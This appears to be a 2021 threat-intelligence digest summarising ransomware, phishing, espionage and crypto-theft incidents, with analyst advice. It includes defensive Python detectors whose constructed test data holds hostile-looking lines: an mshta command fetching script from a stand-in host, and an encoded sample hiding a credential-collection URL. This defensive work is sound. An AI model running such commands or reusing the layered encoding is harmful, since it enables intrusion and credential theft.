Anomali Cyber Watch: Aggah Using Compromised Websites to Target Businesses Across Asia, eCh0raix Targets Both QNAP and NAS, LockBit 2.0 Targeted Accenture, and More

The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: China, Critical Infrastructure, Data Storage, LockBit, Morse Code, Ransomware, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.

Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Colonial Pipeline Reports Data Breach After May Ransomware Attack

(published: August 16, 2021)

Colonial Pipeline, the largest fuel pipeline in the United States, is sending notification letters to 5,810 individuals affected by the data breach resulting from the DarkSide ransomware attack. During the incident, which occurred in May this year, DarkSide also stole roughly 100GB of files in about two hours. Right after the attack, Colonial Pipeline took certain systems offline, temporarily halted all pipeline operations, and paid $4.4 million worth of cryptocurrency for a decryptor, most of it later recovered by the FBI. The DarkSide ransomware gang abruptly shut down their operation due to an increased level of attention from governments, but later resurfaced under the new name BlackMatter. Emsisoft CTO Fabian Wosar confirmed that BlackMatter's RSA and Salsa20 implementations, including their usage of a custom matrix, come from DarkSide.
Analyst Comment: The BlackMatter (ex-DarkSide) group added "Oil and Gas industry (pipelines, oil refineries)" to their non-target list, but ransomware remains a significant threat given its profitability and the growing number of ransomware threat actors with various levels of recklessness. Double-extortion schemes are adding data exposure to a company's risks. Stopping ransomware affiliates requires defense in depth, including patch management, enhancing your Endpoint Detection and Response (EDR) tools with ThreatStream, the threat intelligence platform (TIP), and utilizing data loss prevention (DLP) systems.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Darkside, BlackMatter, Colonial Pipeline, Oil and Gas, Ransomware, Salsa20, Data Breach, USA

Indra — Hackers Behind Recent Attacks on Iran

(published: August 14, 2021)

Check Point Research discovered that a July 2021 cyber attack against the Iranian railway system was committed by Indra, a non-government group. The attackers had access to the targeted networks for a month and then deployed a previously unseen file wiper called Meteor, effectively disrupting train service throughout the country. Previous versions of the Indra wiper, named Stardust and Comet, were seen in Syria, where Indra has been attacking the oil, airline, and financial sectors since at least 2019.
Analyst Comment: It is concerning that even non-government threat actors can damage critical infrastructure in a large country. As with ransomware protection, organizations facing wiper attacks should improve their intrusion detection methods and have a resilient backup system.
MITRE ATT&CK: [MITRE ATT&CK] Data Destruction - T1485 | [MITRE ATT&CK] File Deletion - T1107 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Subvert Trust Controls - T1553
Tags: Indra, Meteor, Iran, Syria, Wiper, Trojan.Win32.BreakWin, Stardust, Comet, Railway, Critical Infrastructure, Oil And Gas, Airline, Finance

Aggah Using Compromised Websites to Target Businesses Across Asia, Including Taiwan Manufacturing Industry

(published: August 12, 2021)

Anomali Threat Research discovered a spearphishing campaign that appears to have begun in early July 2021, targeting the manufacturing industry in Asia. The tactics, techniques, and procedures (TTPs) identified in this campaign align with Aggah. Anomali researchers found multiple PowerPoint files containing malicious macros that used MSHTA to execute a script, which in turn used PowerShell to load hex-encoded payloads, delivering Warzone RAT. Historically, Aggah has used Internet Archive, Pastebin and Blogspot to host malicious scripts and payloads, but in this campaign they moved to using compromised websites.
Analyst Comment: The Aggah group avoids security measures by utilizing compromised websites and implementing an AMSI (Antimalware Scan Interface) bypass. Possible mitigations include secure sandboxed handling of unrequested emails, and network monitoring for malicious PowerShell activity.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Boot or Logon Autostart Execution - T1547 | [MITRE ATT&CK] Abuse Elevation Control Mechanism - T1548 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Impair Defenses - T1562 | [MITRE ATT&CK] Signed Binary Proxy Execution - T1218 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Unsecured Credentials - T1552 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] Video Capture - T1125 | [MITRE ATT&CK] Email Collection - T1114 | [MITRE ATT&CK] Ingress Tool Transfer - T1105
Tags: Aggah, Urdu, Pakistan, Taiwan, Korea, Manufacture, APT, Warzone RAT, PowerShell, AMSI Bypass
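
The execution chain described above (PowerPoint macro, then MSHTA, then PowerShell) can be hunted for in endpoint process-creation telemetry. The following is an added example, not code from Anomali's report: the event records are constructed and use a simplified, hypothetical schema (pid, ppid, image, cmd), and the file names and the example.test host are placeholders.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation records; the field names are a hypothetical, simplified schema.
EVENTS = [
    {"pid": 100, "ppid": 4, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "cmd": r'POWERPNT.EXE "C:\Users\analyst\Downloads\purchase-order.ppt"'},
    {"pid": 210, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe http://compromised-site.example.test/page.html"},
    {"pid": 220, "ppid": 210,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -Command <constructed placeholder>"},
    # Benign look-alikes: neither has PowerPoint in its ancestry.
    {"pid": 300, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe C:\Tools\helpdesk.hta"},
]

def name(ev):
    """Lower-cased executable name of a record's image path."""
    return PureWindowsPath(ev["image"]).name.lower()

def ancestry(ev, by_pid):
    """Return ev followed by its ancestors, nearest first; stops on a missing parent or a loop."""
    chain, seen = [], set()
    while ev is not None and ev["pid"] not in seen:
        chain.append(ev)
        seen.add(ev["pid"])
        ev = by_pid.get(ev["ppid"])
    return chain

def detect(events):
    """Flag mshta.exe running under PowerPoint; escalate when it fetches a URL and spawns PowerShell."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        if name(ev) != "mshta.exe":
            continue
        # Intermediate processes (for example cmd.exe) between PowerPoint and mshta still match.
        if "powerpnt.exe" not in [name(p) for p in ancestry(ev, by_pid)[1:]]:
            continue
        ps_pids = [c["pid"] for c in events if name(c) == "powershell.exe"
                   and ev["pid"] in [a["pid"] for a in ancestry(c, by_pid)[1:]]]
        remote = bool(re.search(r"\bhttps?://", ev["cmd"], re.I))
        alerts.append({"mshta_pid": ev["pid"], "remote_url": remote,
                       "powershell_pids": ps_pids,
                       "severity": "high" if ps_pids and remote else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Real telemetry reuses process IDs over time, so a production version would key the lineage on a per-process unique identifier rather than the bare pid.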

Attackers Use Morse Code, Other Encryption Methods in Evasive Phishing Campaign

(published: August 12, 2021)

Microsoft researchers monitored a targeted, invoice-themed XLS.HTML phishing campaign aimed at stealing geolocation, IP data, and credentials for further exploitation. These attackers changed obfuscation and encryption mechanisms every 37 days on average. This phishing campaign exemplifies the modern email threat: sophisticated, evasive, and relentlessly evolving. The attackers moved from using plaintext HTML code to using multiple encoding techniques. The HTML attachment is divided into up to four segments, including the JavaScript files used to steal passwords (or links to such JS files). It is common for this group to use different encoding mechanisms for different segments inside the same attachment, often combining two methods, including old and unusual ones like Morse code and more common ones such as ASCII, Base64, Char, Escape, and UTF-16 character encoding.
Analyst Comment: Multilayer obfuscation in an HTML attachment can evade email and browser-based security solutions. On their own, the individual segments of the HTML file may appear harmless at the code level and may thus slip past conventional security solutions. Only when these segments are put together and properly decoded does the malicious intent show. Anomali ThreatStream users are equipped with ingested historic malware and network indicators, and can securely detonate email attachments in a sandbox environment.
MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Ingress Tool Transfer - T1105
Tags: XLS.HTML, Phishing, Spear Phishing, Encoding, Obfuscation, Morse Code, Base64, ASCII, Escape, UTF-16
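
For triage, the point that a segment only shows its intent once decoded can be turned into a small layer-peeling routine. This is an added example, not Microsoft's or Anomali's tooling: it handles Morse, hex, Base64 and percent-escape layers only, the sample attachment and example.test hosts are constructed, and the pairing of Morse with hex digits is an assumption.

```python
import base64
import re
from urllib.parse import unquote

_CODES = (".- -... -.-. -.. . ..-. --. .... .. .--- -.- .-.. -- -. --- .--. --.- .-. ... - "
          "..- ...- .-- -..- -.-- --.. ----- .---- ..--- ...-- ....- ..... -.... --... ---.. ----.")
MORSE = dict(zip(_CODES.split(), "abcdefghijklmnopqrstuvwxyz0123456789"))
URL_RE = re.compile(r"https?://[^\s\"'<>]+")

def _morse(s):
    tokens = s.replace("/", " ").split()
    ok = len(tokens) >= 4 and all(t in MORSE for t in tokens)
    return "".join(MORSE[t] for t in tokens) if ok else None

def _hex(s):
    ok = len(s) >= 8 and len(s) % 2 == 0 and re.fullmatch(r"[0-9a-fA-F]+", s)
    return bytes.fromhex(s).decode("utf-8", "replace") if ok else None

def _b64(s):
    if len(s) < 8 or len(s) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
        return None
    try:
        return base64.b64decode(s, validate=True).decode("utf-8")
    except ValueError:  # bad padding or non-text bytes: not this layer
        return None

def _escape(s):
    return unquote(s) if re.search(r"%[0-9a-fA-F]{2}", s) else None

# Order matters: hex text also fits the Base64 alphabet, so hex is tried first.
DECODERS = [("morse", _morse), ("hex", _hex), ("base64", _b64), ("escape", _escape)]

def peel(segment, max_layers=6):
    """Strip one encoding layer at a time; return (layer names, decoded text)."""
    layers, text = [], segment.strip()
    for _ in range(max_layers):
        for layer, decode in DECODERS:
            out = decode(text)
            if out is not None and out != text:
                layers.append(layer)
                text = out
                break
        else:
            break  # nothing applied: fully peeled
    return layers, text

def analyze(html):
    """Peel every quoted string in the attachment; report URLs seen only after decoding."""
    findings = []
    for m in re.finditer(r"\"([^\"]{8,})\"|'([^']{8,})'", html):
        layers, text = peel(m.group(1) or m.group(2))
        findings += [("+".join(layers), url) for url in URL_RE.findall(text) if layers]
    return findings

# Constructed sample; assumption: the Morse layer carries hex digits (Morse has no ':' or '/').
_REV = {char: code for code, char in MORSE.items()}
SEG_A = " ".join(_REV[c] for c in b"https://cdn.example.test/login.js".hex())
SEG_B = base64.b64encode(b"https%3A%2F%2Fpost.example.test%2Fcollect").decode()
SAMPLE = f'<script>var a="{SEG_A}";var b="{SEG_B}";</script><p>Invoice enclosed</p>'
```

A plain URL scan of `SAMPLE` returns nothing, while `analyze(SAMPLE)` reports both URLs together with the layers that hid them.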

Vice Society Leverages PrintNightmare In Ransomware Attacks

(published: August 12, 2021)

Vice Society is a relatively new ransomware gang that first appeared in June 2021. Following the lead of Conti and Magniber, Vice Society is now also actively exploiting the Windows Print Spooler PrintNightmare vulnerability for lateral movement through their victims' networks. PrintNightmare is a set of recently disclosed security flaws (CVE-2021-1675, CVE-2021-34527 and CVE-2021-36958) found to affect the Windows Print Spooler service, Windows print drivers, and the Windows Point and Print feature.
Analyst Comment: As proof of concept (POC) exploits for PrintNightmare leaked, the number of ransomware groups attempting to take advantage of unpatched networks is likely to grow. If users have not already, they should download the latest patch for PrintNightmare from Microsoft. Utilize multi-factor authentication, look at egress filtering for firewalls, utilize an endpoint detection and response platform that detects living-off-the-land binary (LoLBin) tactics and malware implants, and keep up-to-date and offline backups.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] System Owner/User Discovery - T1033 | [MITRE ATT&CK] Account Discovery - T1087 | [MITRE ATT&CK] Domain Trust Discovery - T1482 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] System Services - T1569 | [MITRE ATT&CK] Create or Modify System Process - T1543 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] Lateral Tool Transfer - T1570 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Indicator Removal on Host - T1070 | [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] Impair Defenses - T1562 | [MITRE ATT&CK] Exfiltration Over Alternative Protocol - T1048 | [MITRE ATT&CK] Exploitation for Privilege Escalation - T1068
Tags: Vice Society, PrintNightmare, Conti, Magniber, Ransomware, CVE-2021-36958, CVE-2021-34527, CVE-2021-1675, LoLBin

Accenture Says Lockbit Ransomware Attack Caused 'No Impact'

(published: August 11, 2021)

A ransomware group known as LockBit 2.0 (LockBit) targeted the global IT consultancy company Accenture. The group threatened to publish "all available data" from Accenture unless it paid a $50 million (USD) ransom. An Accenture spokesperson initially downplayed the incident, saying it had little impact on the company's operations. The first small batch of leaked information included PowerPoint presentations and case studies. According to threat intelligence firm Hudson Rock, the attack compromised 2,500 computers used by employees and partners. Another research firm, Cyble, claims that LockBit stole 6 TB of data.
Analyst Comment: Accenture's resilient backup system helped them to restore operations after some of their computers were encrypted by the ransomware. Protection from ransomware-as-a-service (RaaS) groups like LockBit requires multi-layered protection because their affiliates are flexible in their intrusion methods. While LockBit often exploits existing vulnerabilities in the Fortinet FortiOS and FortiProxy products, identified as CVE-2018-13379, the group has also added insiders to their arsenal.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: LockBit, Lockbit 2.0, Ransomware, RaaS, CVE-2018-13379, Accenture, FortiOS

New eCh0raix Ransomware Variant Targets QNAP and Synology Network-Attached Storage Devices

(published: August 10, 2021)

Unit 42 researchers have discovered a new variant of eCh0raix ransomware, which was first reported on by Anomali Threat Research in July 2019. Unlike earlier variants, this one is capable of targeting both Synology network-attached storage (NAS) and Quality Network Appliance Provider (QNAP) NAS devices. Attackers are also leveraging CVE-2021-28799 (an improper authorization vulnerability) to deliver the new ransomware variant to QNAP devices. Currently, at least 250,000 data storage devices are exposed to the attacks, demonstrating significant risks to the small office and home office (SOHO) and small business sectors.
Analyst Comment: Backing up your data to an internet-connected device still leaves it vulnerable to ransomware attacks. Make sure you install security updates. Create complex login passwords to make brute-forcing more difficult for attackers. Allow public admin access to a backup device only if necessary and restrict it to specific whitelisted IP addresses.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Exploitation for Privilege Escalation - T1068 | [MITRE ATT&CK] Process Discovery - T1057
Tags: eCh0raix, CVE-2021-28799, Ransomware, AES Encryption, Tor

UNC215: Spotlight on a Chinese Espionage Campaign in Israel

(published: August 10, 2021)

Chinese espionage group UNC215 leveraged remote desktop protocols to access an Israeli government network using stolen credentials from trusted third parties, according to FireEye researchers. The data revealed multiple, concurrent operations against Israeli government institutions, IT providers, and telecommunications entities beginning in January 2019. The group has previously targeted private companies, governments, and various organizations in the Middle East, Europe, Asia, and North America. Since 2019, UNC215 has been exploiting the Microsoft SharePoint vulnerability CVE-2019-0604 to install web shells. The group heavily relies on custom tools such as a non-public scanner WheatScan, FocusFjord backdoor, and HyperBro, a backdoor with keylogging capabilities. Mandiant researchers have low confidence that UNC215 is associated with Chinese group APT27 (Emissary Panda) that previously targeted the same geographic regions.
Analyst Comment: Chinese cyberespionage activity often follows Chinese strategic interests and investments such as the Belt and Road Initiative (BRI). Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from advanced persistent threats (APTs), including a focus on both network and host-based security. Anomali Match provides real time forensics capability to identify potential breaches and known actor attributions.
MITRE ATT&CK: [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Indicator Removal on Host - T1070 | [MITRE ATT&CK] Proxy - T1090 | [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Access Token Manipulation - T1134 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Trusted Relationship - T1199 | [MITRE ATT&CK] Indirect Command Execution - T1202 | [MITRE ATT&CK] Domain Trust Discovery - T1482 | [MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497 | [MITRE ATT&CK] Create or Modify System Process - T1543 | [MITRE ATT&CK] Boot or Logon Autostart Execution - T1547 | [MITRE ATT&CK] Subvert Trust Controls - T1553 | [MITRE ATT&CK] Inter-Process Communication - T1559 | [MITRE ATT&CK] Hide Artifacts - T1564 | [MITRE ATT&CK] Hijack Execution Flow - T1574
Tags: UNC215, WheatScan, FocusFjord, HyperBro, CVE-2019-0604, APT27, Israel, Government, Emissary Panda, APT, LuckyMouse, Iron Tiger, Bronze Union, China, Middle East, Central Asia

1M Stolen Credit Cards Hit Dark Web for Free

(published: August 10, 2021)

Researchers from threat intelligence firm Cyble noticed the leak of payment card data during routine monitoring of cybercrime and Dark Web marketplaces. The cards were published on an underground card-selling market, AllWorld[.]Cards. The data was stolen between 2018 and 2019 and includes the following fields: address, card number, CVV, email, expiration date, phone number, and ZIP code. This batch represented a vast variety of banks from a vast number of countries, but the most affected were India, Mexico, the US, Australia, and Brazil.
Analyst Comment: Millions of credit card data lines get compromised every month. Financial and retail organizations should monitor for top threats including point-of-sale (POS) card skimmers, online skimmers (Magecart attacks) and banking trojans. Users should monitor their financial statements and contact the issuing bank immediately upon noticing any suspicious activity.
Tags: Carding, Finance, India, Mexico, Australia, Brazil, USA, Magecart, North America

Over $600 Million Reportedly Stolen in Cryptocurrency Hack

(published: August 10, 2021)

On August 10, 2021, Poly Network announced that it suffered an attack that resulted in cryptocurrency assets being transferred into the attackers' wallets. The value of stolen assets is estimated to be at least $611 million, making this the largest Decentralized Finance (DeFi) hack so far. According to SlowMist, a Chinese Blockchain cybersecurity team, the attacker transacted in Monero (XMR) originally and exchanged the funds later for BNB, ETH, MATIC, and other tokens used to fund the attack. SlowMist claimed to know the attacker's email address, IP, and device fingerprint. The attackers were not using a leaked private key. Instead they found a way to replace the “keeper” of the EthCrossChainData contract by carefully crafting requests exploiting certain cross-chain verification and management functions, and possibly using hash collision.
Analyst Comment: Researchers working together with blockchain industry stakeholders were able to blacklist and return a portion of the stolen funds. According to the BBC, Poly Network offered the attacker $500,000 to return the $600 million in crypto-assets, and most of the funds were returned. While many blockchain-related companies fell victim to typical cybersecurity attack vectors such as spear phishing, the new smart contract architecture creates its own vulnerabilities that hackers can and do exploit.
MITRE ATT&CK: [MITRE ATT&CK] Data Manipulation - T1565 | [MITRE ATT&CK] Account Access Removal - T1531
Tags: Smart Contract, Poly Network, Blockchain, Cryptocurrency, ETH, Ethereum, Binance Chain, Polygon, Monero

FlyTrap Android Malware Compromises Thousands of Facebook Accounts

(published: August 9, 2021)

Zimperium’s zLabs mobile threat research team recently found a new Android trojan, dubbed FlyTrap, that has spread to more than 10,000 victims via malicious apps on third-party app stores, sideloaded apps and hijacked Facebook accounts. The malware, operated out of Vietnam, is part of a family of trojans that use social engineering to take over Facebook accounts. Instead of using phishing domains, FlyTrap opens the legitimate Facebook URL inside a WebView configured with the ability to inject JavaScript code and extracts all the necessary information such as cookies, user account details, location, and IP address.
Analyst Comment: Google Play removed the malicious apps after Zimperium zLabs gave it the heads-up, but the FlyTrap-infected apps are still available on third-party app stores. Android users can disallow installation of any app from an untrusted source. If you suspect that your Facebook account has been connected to a malicious party, immediately change your passwords and enable MFA if not already in use.
MITRE ATT&CK: [MITRE ATT&CK] Automated Collection - T1119 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041
Tags: FlyTrap, Android, Facebook, Vietnam, JavaScript Injection

